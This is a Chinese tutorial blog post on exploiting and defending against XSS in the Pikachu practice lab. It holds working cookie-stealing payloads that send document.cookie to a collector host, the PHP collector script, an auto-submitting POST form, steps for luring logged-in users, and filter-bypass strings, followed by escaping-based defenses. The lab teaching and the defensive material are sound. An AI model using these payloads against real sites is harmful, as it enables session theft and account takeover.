美文网首页
03.(2)XSS利用与防御

03.(2)XSS利用与防御

作者: 新一mghc | 来源:发表于2019-03-02 17:54 被阅读0次

    一.漏洞的利用

    1.GET型XSS的利用

    (1).渗透分析

    A. 流程分析

    GET型XSS的利用.png

    B. 基本环境

    存在漏洞页面

    http://192.168.58.130/pikachu/vul/xss/xss_reflected_get.php

    恶意代码
    <script>document.location = 'http://192.168.58.130/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
    
    用户收到的链接

    http://192.168.1.4/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F192.168.1.15%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit

    (2). 渗透过程

    A.构造信息收集代码

    <?php
    include_once '../inc/config.inc.php';
    include_once '../inc/mysql.inc.php';
    $link=connect();
    
    //这个是获取cookie的api页面
    
    if(isset($_GET['cookie'])){
        $time=date('Y-m-d g:i:s');
        $ipaddress=getenv ('REMOTE_ADDR');
        $cookie=$_GET['cookie'];
        $referer=$_SERVER['HTTP_REFERER'];
        $useragent=$_SERVER['HTTP_USER_AGENT'];
        $query="insert cookies(time,ipaddress,cookie,referer,useragent) 
        values('$time','$ipaddress','$cookie','$referer','$useragent')";
        $result=mysqli_query($link, $query);
    }
    header("Location:http://192.168.58.130/pikachu/index.php");//重定向到一个可信的网站
    
    ?>
    

    B. 向登录目标网站用户发送恶意链接,诱使其点击

    C. 成功收集目标信息,可假冒目标登录

    1.POST型XSS的利用

    (1).渗透分析

    A. 流程分析

    POST型XSS的利用.png

    B. 基本环境

    存在漏洞页面

    http://192.168.58.130/pikachu/vul/xss/xsspost/xss_reflected_post.php

    用户收到的链接

    http://192.168.58.130/pkxss/xcookie/post.html

    (2). 渗透过程

    A.构造信息收集代码

    <html>
    <head>
    <script>
    window.onload = function() {
      document.getElementById("postsubmit").click();
    }
    </script>
    </head>
    <body>
    <form method="post" action="http://192.168.58.130/pikachu/vul/xss/xsspost/xss_reflected_post.php">
        <input id="xssr_in" type="text" name="message" value=
        "<script>
    document.location = 'http://192.168.58.130/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
        </script>"
         />
        <input id="postsubmit" type="submit" name="submit" value="submit" />
    </form>
    </body>
    </html>
    
    

    B. 向登录目标网站用户发送恶意链接,诱使其点击

    C. 成功收集目标信息,可假冒目标登录

    三. 其它类型的渗透

    A. 键盘监控

    B. xss的盲打

    C. a href 插入js

    XSS的绕过

    一、转换

    1. 前端绕过
    2. 大小写混合
    3. 拼凑绕过:<scr<script>ipt>alert(1)<scri</script>pt>
    4. 注释绕过:<script>alert(1)<script>

    二. 编码

    XSS的防御

    1.进行转码
    htmlspecialchal()
    函数htmlspecialchars()函数把预定义的字符转换为HTML实体。

    预定义的字符是:

    • &(和号)成为&amp
    • ·(双引号)成为&quot
    • ’(单引号)成为&#039
    • <(小于)成为&t
    • Sok=htmlspe
    • (大于)成为&gt

    可用的引号类型:

    • ENT_COMPAT 默认。仅编码双引号。
    • ENT_QUOTES 编码双引号和单引号
    • ENT_NOQUOTES 不编码任何引号。

    总的原则:输入做过滤,输出做转义

    • 过滤:根据业务需求进行过滤,比如输入点要求输入手机号,则只允许输入手机号格式的数字。
    • 转义:所有输出到前端的数据都根据输出点进行转义,比如输出到html中进行html实体转义,输入到JS里面的进行JS转义

    三、 对参数进行过滤。

    PHP:
    htmlentities() 或是 htmlspecialchars()
    Python:
    cgi.escape()
    ASP:
    Server.HTMLEncode()
    ASP.NET:
    Server.HtmlEncode() 或 Microsoft Anti-Cross Site Scripting Library
    Java:
    xssprotect(Open Source Library)
    Node.js:
    node-validator

    javascript:alert(111)
    q' oneclick='alert(111)'

    相关文章

      网友评论

          本文标题:03.(2)XSS利用与防御

          本文链接:https://www.haomeiwen.com/subject/fflyuqtx.html